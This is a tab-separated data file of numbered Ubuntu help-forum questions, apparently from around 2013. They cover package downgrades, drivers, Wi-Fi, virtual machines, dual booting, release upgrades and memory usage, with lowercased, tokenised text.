285232	how do i downgrade postgresql ?	in my ubuntu 12.04 x64 i installed postgresql 8.4 . it got automatically upgraded to 9.1.1 . due to some inconsistencies , i want to downgrade it to 8.4 . how can i do this using the terminal ?
285233	how to install intel linux drivers in ubuntu 13.04 ?	i have search all around but did n't find any intel linux drivers for ubuntu 13.04 only supported version is 12.04 & 12.10 https : //01.org/linuxgraphics/downloads/2013/intel-linux-graphics-installer so is there any way i can install intel drivers on ubuntu 13.04 ? as searching i have also read a comment on some blogs that drivers are already included in ubuntu 13.04 is it true ? specs hd 3000 with nvidia optimus
285234	can not connect to wpa2/wpa enterprise ( peap and mschap )	i can not connect to my campus wi-fi connection through ubuntu 13.04 but i can do the same through windows . [ 1293.944518 ] wlan0 : authenticate with 00:1a:1e : d5 : f0:30 [ 1293.953216 ] wlan0 : send auth to 00:1a:1e : d5 : f0:30 ( try 1/3 ) [ 1294.154557 ] wlan0 : send auth to 00:1a:1e : d5 : f0:30 ( try 2/3 ) [ 1294.358428 ] wlan0 : send auth to 00:1a:1e : d5 : f0:30 ( try 3/3 ) [ 1294.562357 ] wlan0 : authentication with 00:1a:1e : d5 : f0:30 timed out the same thing keeps occurring .
285236	bridge networking is not working in virtual box 4.2.8 with ubuntu 12.04 host and ubuntu 11.10 guest	very good article but there is a problem for me . i am using virtual box 4.2.8 with ubuntu 12.04 host and ubuntu 11.10 guest . i am unable to setup bridge networking beetween host and guest . here i am pasting configuration of interfaces . configuration on ubunutu12.04 host auto lo iface lo inet loopback auto br0 iface br0 inet static address 192.168.56.22 netmask 255.255.255.0 broadcast 192.168.56.255 gateway 192.168.56.1 bridge_ports eth0 bridge_maxwait 0 auto eth0 iface eth0 inet manual and for ubuntu 11.10 guest , i am selected bridged adapter and under name i selected eth0 interface . and configuration of guest ethernet interface is auto eth2 iface eth0 inet static address 192.168.56.23 netmask 255.255.255.0 broadcast 192.168.56.255 gateway 192.168.56.1 but it is not working when i ping it just says destination host unreachable . please help
285239	is there a way to restore ubuntu 12.10 to default .	i want to remove everything from the hard drive and restore ubuntu 12.10 , can someone please help ?
285246	can not shutdown unless i use tty	on my computer , i noticed a quirk where i can not shutdown unless i enter tty or logout then shutdown from the users screen . clicking on the shutdown button either logs me out or causes lightdm to crash ( error mentions something about broken pipe , i 'm unsure though ) . i 'm using ubuntu 13.04 ( iso 4-23-13 ) 32-bit . any help would be appreciated .
285248	file ownership in debian packages	i just curious about managing file ownership in debian packages . how to preserve file ownership during building deb packages . i want a files own by a specific user when i install them .
285249	uninstall postgresql 9.1.1	i have postgresql 9.1.1 in my ubuntu 12.04 which got installed due to automatic upgrades and whenever i uninstall it using the command : sudo apt-get -- purge remove postgresql-9.1.1 i get an error saying : e : unable to locate package postgresql-9.1.1 e : could n't find any package by regex 'postgresql-9.1.1 can somebody tell me how to uninstall this package completely so that i can install the other lower version - 8.4.7
285250	diagnostic package for graphics adapter	i am just looking for diagnostic tool in ubuntu for testing graphics adapter if available . thanks
285252	not able to install ubuntu 12.04 in vmware workstation 9 - operating system not found error	getting this error operating system not found when trying to install unbuntu through iso file . if i install with the option of giving the path to the iso image stored on my system . i get a message down that the operating system could not be detected . even if go install using the option i will install os later and set the iso image path in vm settings . when i power on the vm i get operating system not found error . please help !
285260	installing ubuntu alongside windows 7 from usb pendrive	i want to install ubuntu alongside windows 7 in my laptop . it 's an i3 processor with windows 7 - 64 bit already installed . please guide me as to what to do ...
285263	how to upgrade from ubuntu 10.04 to 12.04 ( when 'fetching the upgrade failed ' ) ?	i 've been running an ubuntu desktop for a couple of years . i regularly update the security and recommended updates via upgrade manager . however it seems i did n't have upgrade manager set up to tell me of ubuntu updates . having realised this post the april-2013 loss of support for 10.04 , and changed the settings , it now offers me an upgrade to 10.10 . however when clicking on it and following the upgrade instructions , i consistently get the following error message : '' failed to fetch . fetching the upgrade failed . there may be a network problem . '' now i do n't necessarily want 10.10 , and would prefer to skip to the latest one with the longest duration of support available , which appears to be 12.04 lts . bearing in mind i have very few it skills ( ubuntu was set up for me by an it expert to temporarily replace a very slow running windows vista , but i loved it so stuck with it ever since ) : can someone tell me how i can upgrade directly to 12.04 lts ? is there any danger of losing existing files etc that i should be aware of in doing so ? and - less importantly , but if anyone has time to explain - what exactly is the difference between supported and unsupported ( ie . what would happen longer term if i just carried on using 10.04 ) ? many thanks , tim .
285265	avoid reinstall virtualbox and update to the latest release	installing virtualbox-extension-pack-4.2.12 to enable usb2.0 controller prompted only to work with the latest release . but my current version is 4.0.18 on debian wheezy . the latest release of virtualbox was 4.2.12 ( ca n't update from apt-get , the newest release is n't in the source ) . so i downloaded the newest deb file from oracle.com . dpkg -- install latest-release.deb told me that i have had installed virtualbox . how avoid reinstall vritualbox or update it from the downloaded .deb file ? pls , i do n't wan na reinstall my virtualbox .
285267	how can i get my western digital hd to work ?	the program in the hd wo n't respond to the cursor .
285268	how to get the obacklight solution to brightness problem working ?	i can set the backlight using xrandr ( although the mouse pointer stays sharply bright ) but if i suspend the laptop , after waking it up it is on max brightness again . i have a dell 17 l702x and i have managed to isntall nvidia drivers . xbacklight is not working and i decided to try the obacklight solution . i am following the instructions here and here . however i have no idea how to add a module and i do n't actually understand what a module is and what is the module in the current situation . any help will be appreciated , including different solutions .
285275	unable to see the desktop after installing 12.04 32bit in virtual box just logging into cmd interface	i am using win7 ultimate 64bit my processor is amdfx6100 motherboard is asusm5a78l-m/usb3 so can u suggest which version of ubuntu will work for me and in which software such as vmware , virtual box
285276	will i have trouble after upgrade ?	i have ubuntu 12.10 with installed gnome 3 , and unity removed , i just want to ask if there will be any problems after dist-upgrade , or it has nothing to do with which window manager i use . should i back-up anything ?
285277	google+ updates balloon is blank in firefox	in gmail and google+ a 1 is displayed as i have an update , but when i click on it , the balloon that shows-up is plain white and the clicks on it are transparent ( i.e . they point to the links below the balloon ) . is there any known fix ?
285281	gnome 3.4 partially or totally freeze	i 'm using an ubuntu 12.04 lts . since , i discovered that there are other desktops on ubuntu , rather than unity , i installed gnome 3.4 . but it freezes time by time , when i run many applications or little . sometimes i can enter into no gui with ctrl+alt+f1 and to restart my gdm , sometimes not , but my music is still playing in background , so i think kernel is not blocked , it 's a gpu problem or maybe another . please give me some advice or maybe you know what the problem is and the solution .
285284	virtualbox screen resolution without guest additions	i have read many posts about screen resolutions for ubuntu as virtualbox guest . may be i failed to read the good one ... so . i `` just '' want to make more screen resolutions available without installing/modifying anything requiring superuser access in the ubuntu guest vm ( then without guest additions ) . this requirement is a mandatory security issue for my project . i am quite confident that it must be somehow possible , because setting `` grub_gfxmode=1280x1024 '' in /etc/default/grub uses 1280x1024 in grub boot menu only . this shows that the virtual box virtual graphic card does support it . ps : please do n't reply anything involving guest additions..
285287	wifi keeps asking for password - ubuntu 12.10	i just installed a fresh ubuntu 12.10 and it still keeps asking me for password . i 've spent a few days of searching on net without any luck . i tried loading different drivers , using wicd instead of network-manager , re-configuring router , but still no luck . there are many threads already about this issue , but none solved my issue . i have a usb wifi dongle netgear wna1000m and the driver was installed automatically . although , when i choose a network to connect to , enter the password , it keeps prompting me for password again . cable connection works good . i 've run out of ideas . can you please suggest further ? thank you ! lukas
285288	webcam installation on hp probook	i am using hp probook 4520s . my laptop have webcam ( camera inside ) , but i can not reach it and use webcam anyway . how can i install or reinstall webcam ?
285294	need to reboot twice when ubuntu 12.04.1 mdadm raid1 degraded	i 'm testing mdadm raid1 . i 'm using two hdd . created / ( /dev/md0 with /dev/sda1 and /dev/sdb1 ) and swap ( /dev/md1 with /dev/sda5 and /dev/sdb5 ) after os installed . i removed one hdd and reboot the system . the system show black screen ( after grub boot loader loaded ) . i need to force shutdown the system and restart again . then the system can boot into os . i tried several times . it 's all the same . i need to reboot twice . is that normal ?
285296	minimized windows to appear as `` half-icons '' in hidden launcher	i was wondering if there is a way of having the minimized windows displayed in launcher as `` half icons '' ? something like this : but for all applications . i like to have the launcher hidden most of the time , and i 'd find it much more productive to see what windows i have opened and have a constant access to see what is the application doing ( i.e . chrome downloads ) . it does n't have to be unity ( but would be preferred ) .
285297	how to start xampp in my browser after installing it successfully	i followed this link to install xampp on my machine : xammp for linux . i ca n't open xampp in my browser , but i 'm getting the 404 errror i.e not found the requested url /xampp/index.php was not found on this server . apache/2.2.20 ( ubuntu ) server at localhost port 80 can anyone help me to find out the error .
285300	sudo su automatically	it is possible to log in automatically as root after typing sudo su - without entering password again ? i know it is not safe , but i want this behavior just for specific ip addresses thank you , alex
285305	ubuntu 12.10 vmware tools installing takes for ever	after i started to install the vmware tools in the vm machine and rebooted system prompted to use the shell for a while , but this seems to take forever i ran top and can see vmtoolsd is there running i did have where i think might be a concern , when installing the tools , prompted for the kernel header file , seems i did n't manage to point it to the correct location . but anyways i am not stopped there . but currently the installation do n't seem to proceed , how can i verify the progress of the tooling installation ? can i re-do the process ? and is there a more convinient way to install the vmware tools to the vm machien ? my current screen : vmware easy install please wait ! vmware tools is currently being installed on your system . depending on the version of ubuntu you are installing . you may login in below and use the system during the installation . otherwise , please wait for the graphical environment to lanuch . thank you . i did the following to installation mirror the installation package which sit under the vmware folder ( searched result told me that the vmware tool is name as linux.zip ) copy that installation file to /tmp and started to install
285306	dual boot in ubuntu with pre-installd windows 8 in hpg6-2301ax	i have a hp laptop with windoows 8 pre-installed . i installed ubuntu-12.10 with wubi.exe , i got screen about about os selection . but when i choose ubuntu , it crashes saying wubildr.mbr file missing . i tried disabling secure boot and tried to install from live usb but no luck . i need to keep windows 8 in my laptop as i work as a .net developer , i have two spare partition each of 20 gb for this purpose in my harddisk . i want to install ubuntu in one of the partition and use another as swap area . i am totally new to linux . please suggest me how to do it . thanks in advance..
285307	help how to install hd5550 in xubuntu 13.04	how to install a ati hd5550 in xubuntu 13.04 please help
285311	which architecture should i install on samsung n145 plus ?	i have a netbook samsung n145 plus and i want to know which of ubuntu versions is the best for me . i will use gcc compiler on ubuntu and some other programs for code development ( netbeans , eclipse ) . processor : intel atom n455 1.6 ghz ( x64 copatible ) ram : 1 gb i want to know , can i install x64 ubuntu 12.10 and how it can work on my device ?
285313	how to customize ( add/remove folders/directories ) the `` places '' menu of ubuntu 13.04 `` files '' application ?	i ca n't seem to find a way to customize ( add/remove folders/directories ) the `` places '' menu in the most recent `` files '' application of ubuntu 13.04 . the procedures used with `` nautilus '' in the previous versions of ubuntu ( bookmarking or drag & drop ) do n't seem to work anymore . does anybody have a clue on how to do that ?
285314	update manager not showing option to upgrade to 13.04	i am currently running 12.10 . i went to the update manager and made sure everything was updated . i then reopened it hoping to see the option to upgrade to 13.04 . but there was no option . how can i get this to work ?
285323	white wallpaper after 13.04 upgrade	i recently upgraded to 13.04 but now my wallpaper is missing , i only have a white background although everything seems to be working ( icons , etc. ) . i tried to change the `` have file manager handle the desktop '' on tweak tool and directly in gconf with success . gsettings set org.gnome.desktop.background show-desktop-icons false the only time i see the configured wallpaper is when the screen is locked .
285329	vim and terminal in the same tab	i 'm not an experienced programmer but i 'd like to become one , one day : ) i 've seen a video in which a programmer is using a vim session with 2 windows ( and i know how to do , with : vsplit ) and another horizontal window in which he has the terminal . i do n't know how to achieve this last horizontal window for the terminal . can anyone here give me advice ?
285338	ubuntu wo n't detect my dell 1395 wlan mini wireless card	i had just downloaded ubuntu alongside windows using wubi . i love ubuntu but ubuntu does n't seem to recognize my wireless card . i have read elsewhere about installing the ndiswrapper but that requires an internet connection . without ubuntu recognizing my dell 1395 wlan mini card i ca n't access the internet using ubuntu . so how do i download the ndiswrapper via windows and transfer it to ubuntu and install it via the terminal . i hope for an answer as soon as possible . thanks
285340	wireless mouse usb error `` device not accepting address ''	i am using ubuntu 10.04 mouse is a logitech m570 this problem occured after a two years of successful usage of this mouse on this machine this might help ... mark @ marks-latitude-e6510 : ~ $ lsusb bus 002 device 007 : id 0a5c:5800 broadcom corp. bcm5880 secure applications processor bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and this ... . mark @ marks-latitude-e6510 : ~ $ dmesg | grep -i usb ... . [ 620.335673 ] usb 2-1.3 : device descriptor read/64 , error -32 [ 620.524650 ] usb 2-1.3 : new full speed usb device using ehci_hcd and address 44 [ 620.945042 ] usb 2-1.3 : device not accepting address 44 , error -32 [ 621.023990 ] usb 2-1.3 : new full speed usb device using ehci_hcd and address 45 [ 621.442056 ] usb 2-1.3 : device not accepting address 45 , error -32 [ 621.442366 ] hub 2-1:1.0 : unable to enumerate usb device on port 3 any thoughts ?
285342	why does vblank_mode improve framerate drastically in benchmarks ?	i am messing around trying to find the best graphics solution for my laptop with optimus nvidia . ( asus k55vd ) i 've got bumblebeed running and i use optirun when i want to improve graphics performance . the only problem is that i dont know if it is really working . when i execute eg . glxgears i get the following performance results : normal glxgears on intel graphics : arround 60 fps optirun glxgears on nvidia graphics : arround 1300 fps well this looks fine i guess.. my wondering starts when i execute with vblank_mode=0 in front of both the commands : vblank_mode=0 glxgears gives : arround 5000 fps vblank_mode=0 optirun glxgears gives : around 1400 pfs why am i getting such weird results ?
285344	guest account files	my houseguest just wrote a 20 page paper using the guest account on my computer . we saved it and she logged out . is that paper gone ? we have n't rebooted . i 'm going to feel really , really horrible if this is gone ! i logged her out so i could try to troubleshoot the fact that her thumb drive is n't mounting . i do n't see anything in /tmp that looks like the guest file .
285345	vino server not starting remotely	i have a remote ubuntu vm on which i want to start vnc . however when i attempt to start it , i get the following error . ( process:2269 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . can not open display : run 'vino-server -- help ' to see a full list of available command line options any idea what i could be doing wrong , and how should i go about debugging it ?
285353	why do cli and gui methods for shutting down have different security measures ?	cli option for shutting down the system is sudo shutdown -h now this requires the user to give the administrator password , whereas shutting down via gui does n't require any password . why does gui method not require any password ? does it remember that we used the password to login ? in that case why does it ask for a password in the terminal ? this is not a duplicate because i think there is no question regarding the password while shutting down the system .
285358	64-bit intel machine can use the amd64-bit ?	i have a intel 64-bit laptop with 8gb . i found somewhere that if i want to take the most out of my machine i should use the 64-bit version . but , is it correct that i can use the `` desktop image for 64-bit pc ( amd64 ) computers '' ( http : //releases.ubuntu.com/13.04/ ) on my machine ? intel core i7 2670qm
285360	booting problem from external hard drive	i installed ubuntu 12.10 on an external hard drive using an acer one netbook ( windows xp ) and used the same external disk with another desktop pc ( windows xp ) . now it does not load ubuntu . instead i get an error message : 'hd0 missing ' etc . i tried reinstalling ubuntu , now a grub on text command prompt comes , like grub > . i do n't know what to do now . any suggestions ?
285366	where can i get i915_error_state from debugfs and the full dmesg ?	my system has been intermittently freezing ( apart from the cursor ) for a month or two . i am running ubuntu 12.04 on a dell xps l502x ( hybrid graphics card , so i 'm running bumblebee ) . usually even sysreq + reisub wo n't reboot it , and i have to hard reboot . this last time i actually was n't forced to reboot and got a tty up . i got the following from the end of less /var/log/xorg.0.log http : //pastebin.com/fiwpay30 . upon returning to tty 7 , i was kicked out to the login screen . the log asks `` detected a hung gpu , disabling acceleration . when reporting this , please include i915_error_state from debugfs and the full dmesg . '' how can i do this ?
285369	error while adding iso in virtualbox on ubuntu 13.04	while adding an iso file to a newly created virtual machine in virtualbox 4.2.10 , the program just stops working , but when i open it again and go again to add the iso , it 's adding ok . when i made another virtual machine it happened again - first time virtualbox crashed when adding an iso . everything happened on an ubuntu 13.04 host with gnome shell .
285370	can i upgrade from 12.10 to 13.04 without losing my data ?	and if so , how ? the only way i found was by a new install , and i 'd like to know if there is an alternative like in previous versions .
285373	ca n't add serial code/activate vmware	i download latest vmware workstation form vmw page , and install it in ubuntu 13.04 . when i run vmw it ask me for activation , so i click `` enter licence key '' but nothings happen so i ca n't run machines . even after restart . ubuntu 13.04 with gnome shell
285383	i ca n't install ubuntu 13.04 on a new computer	i'am trying to install 13.04 via usb ; however , when i boot to grub and press install ubuntu , my screen will flash repeatedly between white and purple and will no proceed any further . so i pressed `` e '' in the `` install ubuntu '' option and changed `` quiet splash '' to `` quiet splash nomodeset '' that made me able to recognize the colors in the typical installation process in ubuntu , but everything seems to be piled up in the upper part of my screen , making it impossible to proceed in the installation . my computer is a toshiba satellite s855-s5170 and i attribute this problem to the dual graphics card ( amd radeon hd 7670m graphics 2gb ddr3 ) . thanks for taking the time to help me . update 26/04/2013 i managed to install ubuntu by disabling `` virtualization technology '' in my bios ( which i believe let 's me operate several os 's ) and changing in grub2 `` quiet splash '' to `` quiet splash nomodeset '' . however , when i reboot after installation ( i installed the third party software ) , my screen will start blinking again . so i again changed the command `` quiet splash '' to `` quiet splash nomodeset '' but now i end up in what i believe is the terminal . but i do not know how to proceed from here . again thanks for helping me . update 27/04/13 i changed 'quiet splash ' to 'nomodeset ' as it was suggested , but i did the same thing ( i end up in the terminal ) then ( inside the terminal ) i tried 'startx ' but it says that ' [ ksm ] drm report modesetting isnt supported ' 'fatal error : no screens found ' what can i do now ? thanks for the support .
285387	memory usage does n't add up over time	the memory usage on my ubuntu 13.04 system does n't add up over time . i 've tried the 3.8.0-xx kernels and the latest 3.9 from /~kernel-ppa/mainline . when i first boot , it all adds up correctly but after a couple of days , this is what it looks like . $ free -k total used free shared buffers cached mem : 7978976 7319920 659056 0 97248 1344356 -/+ buffers/cache : 5878316 2100660 swap : 2438140 0 2438140 free is reporting that about 5.8g of resident memory is being used excluding cache and buffers . when i sum the rss reported by the ps command , the totals differ dramatically . sudo ps -eo pid , rss , args > mem.txt pid rss command 6377 848,268 /usr/lib/firefox/firefox 6095 243,664 /usr/bin/gnome-shell 1752 72,300 /usr/sbin/mysqld 6167 71,460 /var/lib/dropbox/.dropbox-dist/dropbox 7608 66,952 /usr/bin/python /usr/bin/deluge-gtk 23320 57,892 /usr/bin/x :3 -background none -verbose -auth /run/gdm/auth-for-gdm-9zmczs/database -nolisten tcp vt7 6445 45,476 /usr/lib/firefox/plugin-container /usr/lib/adobe-flashplugin/libflashplayer.so -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 6377 true plugin 6159 39,784 nautilus -n 6153 37,276 /usr/bin/python /usr/bin/autokey-gtk 9306 29,432 gnome-terminal 6152 27,152 nm-applet 6066 24,796 /usr/lib/gnome-settings-daemon/gnome-settings-daemon 6434 20,120 /usr/lib/firefox/plugin-container /opt/google/talkplugin/libnpgoogletalk.so -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 6377 true plugin 9505 17,700 /usr/sbin/apache2 -k start 6154 16,096 update-notifier 6437 13,516 /opt/google/talkplugin/googletalkplugin 6184 13,192 /usr/lib/evolution/evolution-calendar-factory 5983 12,372 gnome-session -- session=gnome 3746 9,468 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock 9510 8,476 /usr/sbin/apache2 -k start 9511 8,476 /usr/sbin/apache2 -k start 9512 8,476 /usr/sbin/apache2 -k start 9513 8,476 /usr/sbin/apache2 -k start 9514 8,476 /usr/sbin/apache2 -k start 6112 7,732 /usr/lib/evolution/evolution-source-registry 1890 7,212 /usr/bin/atop -a -w /var/log/atop/atop_20130425 600 6106 6,912 /usr/lib/gnome-shell/gnome-shell-calendar-server 1646 6,868 networkmanager 6073 6,404 /usr/bin/pulseaudio -- start -- log-target=syslog 6125 6,080 /usr/lib/telepathy/mission-control-5 5588 5,592 /usr/lib/udisks2/udisksd -- no-debug 1229 5,568 /usr/lib/colord/colord 6129 5,560 /usr/lib/gvfs/gvfs-udisks2-volume-monitor 1205 5,532 smbd -f 5954 5,220 gdm-session-worker [ pam/gdm-password ] 1656 5,164 /usr/lib/policykit-1/polkitd -- no-debug 9312 5,112 -bash 5965 5,040 /usr/bin/gnome-keyring-daemon -- daemonize -- login 9531 4,952 -bash 1759 4,900 whoopsie 1606 4,412 /usr/sbin/winbindd -f 3149 4,300 /usr/lib/upower/upowerd 2992 4,068 /usr/sbin/console-kit-daemon -- no-daemon 23316 3,952 /usr/lib/gdm/gdm-simple-slave -- display-id /org/gnome/displaymanager/displays/_3 6299 3,800 /usr/lib/gvfs/gvfsd-metadata 1090 3,748 /usr/sbin/cupsd -f 1721 3,708 /sbin/dhclient -d -sf /usr/lib/networkmanager/nm-dhcp-client.action -pf /run/sendsigs.omit.d/network-manager.dhclient-eth0.pid -lf /var/lib/networkmanager/dhclient-681b428f-beaf-8932-dce4-687ed5bae28e-eth0.lease -cf /var/lib/networkmanager/dhclient-eth0.conf eth0 2988 3,672 /usr/lib/accountsservice/accounts-daemon 6228 3,540 /usr/lib/gvfs/gvfsd-trash -- spawner :1.4 /org/gtk/gvfs/exec_spaw/0 6043 3,296 /usr/lib/at-spi2-core/at-spi2-registryd -- use-gnome-session 1728 3,288 gdm 6136 3,220 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor 6144 3,212 /usr/lib/gvfs/gvfs-afc-volume-monitor 6036 3,204 /usr/lib/at-spi2-core/at-spi-bus-launcher 1607 3,196 /usr/sbin/modem-manager 1 3,096 /sbin/init 6087 3,044 /usr/lib/pulseaudio/pulse/gconf-helper 6047 2,992 /usr/lib/gvfs/gvfsd 6089 2,900 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 6274 2,832 /usr/lib/dconf/dconf-service 1248 2,772 /usr/sbin/cups-browsed 1571 2,696 /usr/sbin/sshd -d 6140 2,648 /usr/lib/gvfs/gvfs-mtp-volume-monitor 1484 2,608 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 9662 2,600 sudo ps -eo pid , rss , args 3614 2,428 /usr/sbin/afpd -u uams_dhx2.so , uams_clrtxt.so -g nobody -c 50 -n cheetah 771 2,340 dbus-daemon -- system -- fork 5376 2,124 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 117:126 6032 1,908 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 1642 1,780 /usr/sbin/winbindd -f 3460 1,760 qmgr -l -t fifo -u 928 1,728 avahi-daemon : running [ cheetah.local ] 866 1,704 /usr/sbin/bluetoothd 719 1,700 /sbin/udevd -- daemon 9637 1,696 man ps 1627 1,684 nmbd -d 762 1,652 rsyslogd -c5 2850 1,636 /usr/lib/postfix/master 1239 1,608 smbd -f 7599 1,608 pickup -l -t fifo -u -c 6040 1,488 /bin/dbus-daemon -- config-file=/etc/at-spi2/accessibility.conf -- nofork -- print-address 3 1760 1,472 /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground -- no-hosts -- bind-interfaces -- pid-file=/var/run/networkmanager/dnsmasq.pid -- listen-address=127.0.1.1 -- conf-file=/var/run/networkmanager/dnsmasq.conf -- cache-size=0 -- proxy-dnssec -- enable-dbus=org.freedesktop.networkmanager.dnsmasq -- conf-dir=/etc/networkmanager/dnsmasq.d 5399 1,368 /sbin/udevd -- daemon 5400 1,368 /sbin/udevd -- daemon 1233 1,356 rpc.statd -l 3516 1,308 /usr/lib/rtkit/rtkit-daemon 9648 1,188 pager -s 1719 1,044 cron 1675 976 /sbin/getty -8 38400 tty5 1691 976 /sbin/getty -8 38400 tty2 1692 972 /sbin/getty -8 38400 tty3 1695 972 /sbin/getty -8 38400 tty6 3971 972 /sbin/getty -8 38400 tty1 1668 968 /sbin/getty -8 38400 tty4 1216 964 rpcbind -w 716 900 upstart-udev-bridge -- daemon 2893 880 /usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -r /var/run/dnsmasq/resolv.conf -7 /etc/dnsmasq.d , .dpkg-dist , .dpkg-old , .dpkg-new 9663 868 ps -eo pid , rss , args 9311 824 gnome-pty-helper 1703 816 acpid -c /etc/acpi/events -s /var/run/acpid.socket 1737 776 /usr/sbin/irqbalance 3606 760 /usr/sbin/cnid_metad -l log_note 1235 732 upstart-socket-bridge -- daemon 763 680 rpc.idmapd 6031 592 /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=gnome 933 472 avahi-daemon : chroot helper 457 420 upstart-file-bridge -- daemon 6028 316 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=gnome 1717 168 atd 2 0 [ kthreadd ] 3 0 [ ksoftirqd/0 ] 5 0 [ kworker/0:0h ] 7 0 [ kworker/u:0h ] 8 0 [ migration/0 ] 9 0 [ rcu_bh ] 10 0 [ rcu_sched ] 11 0 [ watchdog/0 ] 12 0 [ watchdog/1 ] 13 0 [ migration/1 ] 14 0 [ ksoftirqd/1 ] 16 0 [ kworker/1:0h ] 17 0 [ watchdog/2 ] 18 0 [ migration/2 ] 19 0 [ ksoftirqd/2 ] 21 0 [ kworker/2:0h ] 22 0 [ watchdog/3 ] 23 0 [ migration/3 ] 24 0 [ ksoftirqd/3 ] 26 0 [ kworker/3:0h ] 27 0 [ watchdog/4 ] 28 0 [ migration/4 ] 29 0 [ ksoftirqd/4 ] 31 0 [ kworker/4:0h ] 32 0 [ watchdog/5 ] 33 0 [ migration/5 ] 34 0 [ ksoftirqd/5 ] 36 0 [ kworker/5:0h ] 37 0 [ khelper ] 38 0 [ kdevtmpfs ] 39 0 [ netns ] 40 0 [ bdi-default ] 41 0 [ kintegrityd ] 42 0 [ kblockd ] 43 0 [ ata_sff ] 44 0 [ khubd ] 45 0 [ md ] 46 0 [ devfreq_wq ] 48 0 [ irq/72-amd-vi ] 49 0 [ khungtaskd ] 50 0 [ kswapd0 ] 51 0 [ ksmd ] 52 0 [ khugepaged ] 53 0 [ fsnotify_mark ] 54 0 [ ecryptfs-kthrea ] 55 0 [ crypto ] 66 0 [ kthrotld ] 74 0 [ binder ] 93 0 [ deferwq ] 94 0 [ charger_manager ] 198 0 [ scsi_eh_0 ] 204 0 [ scsi_eh_1 ] 205 0 [ firewire ] 219 0 [ kworker/u:3 ] 220 0 [ scsi_eh_2 ] 239 0 [ scsi_eh_3 ] 251 0 [ scsi_eh_4 ] 255 0 [ scsi_eh_5 ] 259 0 [ scsi_eh_6 ] 260 0 [ scsi_eh_7 ] 269 0 [ kworker/u:6 ] 283 0 [ scsi_eh_8 ] 284 0 [ scsi_eh_9 ] 360 0 [ kworker/5:1h ] 361 0 [ jbd2/sda1-8 ] 362 0 [ ext4-dio-unwrit ] 643 0 [ xfsalloc ] 644 0 [ xfs_mru_cache ] 645 0 [ xfslogd ] 646 0 [ xfs-data/sdb1 ] 647 0 [ xfs-conv/sdb1 ] 648 0 [ xfs-cil/sdb1 ] 650 0 [ xfsaild/sdb1 ] 695 0 [ xfs-data/sdc1 ] 696 0 [ xfs-conv/sdc1 ] 697 0 [ xfs-cil/sdc1 ] 698 0 [ xfsaild/sdc1 ] 730 0 [ rpciod ] 743 0 [ nfsiod ] 922 0 [ krfcommd ] 944 0 [ kworker/4:1h ] 1017 0 [ edac-poller ] 1029 0 [ hd-audio0 ] 1031 0 [ kpsmoused ] 1060 0 [ kvm-irqfd-clean ] 1107 0 [ hd-audio1 ] 1157 0 [ kworker/3:1h ] 1190 0 [ kworker/2:1h ] 1198 0 [ kworker/1:1h ] 1793 0 [ kauditd ] 1845 0 [ flush-8:0 ] 3569 0 [ iprt ] 4867 0 [ kworker/4:1 ] 5403 0 [ nfsv4.0-svc ] 5848 0 [ kworker/0:1h ] 5935 0 [ kworker/2:3 ] 9274 0 [ kworker/5:2 ] 9527 0 [ kworker/5:0 ] 9630 0 [ flush-8:32 ] 10694 0 [ kworker/3:3 ] 13358 0 [ kworker/1:0 ] 18154 0 [ kworker/0:0 ] 19625 0 [ kworker/4:0 ] 23502 0 [ kworker/3:2 ] 31403 0 [ kworker/2:1 ] 32141 0 [ kworker/0:2 ] 32655 0 [ kworker/1:1 ] 1,939,900 ps reports that the sum off all the resident memory used by all my processes is about 1.9g . what processes are using the remaining 3.9g ? edit : more information on kernel memory usage . slabtop reports the following . objs active use obj size slabs obj/slab cache size name 2233988 2233988 100 % 0.88k 62057 36 1985824k xfs_inode 735948 714094 97 % 0.22k 20443 36 163544k xfs_ili 129280 117946 91 % 1.00k 4040 32 129280k nfs_inode_cache 92344 92344 100 % 0.93k 2716 34 86912k ext4_inode_cache 292866 292866 100 % 0.19k 13946 21 55784k dentry 75096 71346 95 % 0.55k 2682 28 42912k radix_tree_node does this mean that the kernel is using almost 2gb to cache xfs_inodes , cache that 's not reported in the cached column of the free command ?
285388	12.04.2 install/reboot problem	i downloaded 12.04.2 lts and burned the iso to dvd , dropped it into the dvd drive then restarted my computer . everything worked fine and the install process went thru without any errors until it got the the reboot process . after it finishes install and it then tells you that you need to reboot in order to use the new installation , i click reboot and it runs thru the process of ending everything so it can reboot and all of the sections shown during this process all come up as `` ok '' result but it still `` hangs '' and the system never fully reboots and it just sits there . any idea as to why it hangs on the reboot ?
285395	how can i copy juju tools for use in my deployment ?	when i try to boostrap my cloud environment i receive the following error : error command failed : no tools available error : no tools available how do i make these tools available for my environment ?
285396	running ubuntu 12.10 from a usb stick ?	sounds easy but it is not.i downloaded ubuntu 12.10 to a usb stick so i can carry it around and use it on any computer.i try to running the os from stick but it just does not work.so what i am doing wrong and what i have to do to get to work.search on the net for good tutorial but find none .
285401	unity frozen during upgrade from 12.10 to 13.04	i started the upgrade process , and sometime around the `` installing '' step , unity froze . the hard drive light is on , so i do n't want to reboot it , but i also ca n't do anything at the moment . is this normal ? what should i do ? update : it 's been over an hour now . i 'm going to download the iso on another machine , and if it 's still frozen when that finishes , i 'll sudo reboot it and install the new version from a flash drive . unless someone knows a better solution ...
